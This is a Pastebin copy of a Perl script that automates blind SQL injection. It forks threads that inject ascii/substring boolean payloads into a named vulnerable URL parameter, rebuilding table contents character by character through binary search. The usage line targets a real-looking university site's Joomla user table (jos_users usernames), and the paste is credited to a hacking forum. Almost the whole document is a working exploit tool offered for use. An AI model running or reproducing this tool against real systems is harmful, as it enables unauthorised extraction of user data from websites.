Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- use LWP::UserAgent;
- use HTML::Parse;
- use HTML::FormatText;
- use Getopt::Long qw(:config no_ignore_case bundling);
- # Blind sql injection.
- # COMMANDLINE.
- GetOptions( 'h=s'=>\$url,'type=s'=>\$type,'p=s'=>\$opt_p,'T=s'=>\$opt_T,'C=s'=>\$opt_C,'threads=i'=>\$threads,'rows=i'=>\$rows );
- if ($type ne 'char' && $type ne 'int') { print "\nYou must enter --type: char or int"; &usage; exit; };
- if (!$opt_p) { print "\nYou must enter the vulnerable paramater."; &usage; exit; };
- if (!$url || !$opt_T | !$opt_C) { &usage; exit; };
- $threads=5 if (!$threads); # default threads
- $rows=100 if (!$rows); # default rows to get
- $start = localtime();
- my $ua=new LWP::UserAgent;
- $ua->timeout(30);
- my $content=$ua->get($url);
- my $orig_page=HTML::FormatText->new->format(parse_html($content->content));
- print "Started $start\n";
- for ($sql_limit=0; $sql_limit<$rows; $sql_limit++)
- {
- @waitlist = (1..1000);
- $end_of_string=0;
- my @word;
- while (@waitlist) {
- for ($count = 0; $count<$threads; $count++) {$current_batch[$count]=shift(@waitlist);}
- foreach $letter (@current_batch) {
- pipe *{$letter},RETHAND;
- unless ($pid = fork()) {
- sub1();
- exit();
- }
- }
- # wait for returned data
- autoflush STDOUT 1;
- foreach $letter (@current_batch) {
- $response = <$letter>;
- $end_of_string=1 if ($response==31);
- $word[$letter]=chr($response);
- printf "\r%3d %1s",$letter,chr($response);
- }
- last if ($end_of_string==1); # end of string - exit loop
- }
- print "\n\n";
- foreach (@word) {
- print "$_";
- }
- print "\n\n";
- last if (ord($word[1])==31); # no more rows - exit loop
- } # increase row / limit
- $end = localtime();
- print "\n\nCompleted $end\n";
- sub sub1 {
- if (defined $letter) {
- my ($lower,$upper)=(31,123);
- while ($upper-$lower>1) {
- my $diff=($upper-$lower)/2;
- $diff=int($diff + .5);
- $diff+=$lower;
- $ua=new LWP::UserAgent;
- $ua->timeout(15);
- $url=~m/(.+[&|\?]$opt_p=.+?)(&.+)/i;
- if ($1) {
- if ($type eq 'int') {
- $content=$ua->get($1 . ' and ascii(substring((select ' . $opt_C . ' from ' . $opt_T . ' limit ' . $sql_limit . ',1),' . $letter . ',1))>=' . $diff . $2);
- } else {
- $content=$ua->get($1 . '\' and ascii(substring((select ' . $opt_C . ' from ' . $opt_T . ' limit ' . $sql_limit . ',1),' . $letter . ',1))>=' . $diff . ' and 1=\'1' . $2);
- }
- } else {
- if ($type eq 'int') {
- $content=$ua->get($url . ' and ascii(substring((select ' . $opt_C . ' from ' . $opt_T . ' limit ' . $sql_limit . ',1),' . $letter . ',1))>=' . $diff);
- } else {
- $content=$ua->get($url . '\' and ascii(substring((select ' . $opt_C . ' from ' . $opt_T . ' limit ' . $sql_limit . ',1),' . $letter . ',1))>=' . $diff . ' and 1=\'1');
- }
- }
- $content=HTML::FormatText->new->format(parse_html($content->content));
- #($content!~m/A4583SL/)?$upper=$diff:$lower=$diff;
- ($content ne $orig_page)?$upper=$diff:$lower=$diff;1
- }
- print RETHAND "$lower\n";
- }
- }
- sub usage
- {
- print "\n";
- print "\nUSAGE : $0 [-h URL] [-p vuln p.] [--type int|char] [-T table name] [-C column name]\n";
- print "\n-h = Host address.";
- print "\n-p = Vulnerable parameter.";
- print "\n--type = vulnerable parameter type; int or char.";
- print "\n-T = Table name.";
- print "\n-C = Column name.";
- print "\n--threads = [optional] number of threads, default is 5";
- print "\n--rows = [optional] number of rows to dump, default is 100";
- print "\n\nEg usage: perl $0 -h \"http://www.cs.teiher.gr/index.php?option=com_juser&task=show_bio&id=88&lang=en\" -T jos_users -C username --type int -p id";
- print "\n\n\n";
- }
- Read more: http://www.ubers.org/Thread-PERL-Blind-SQLi#ixzz3Cm0YlqHk
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement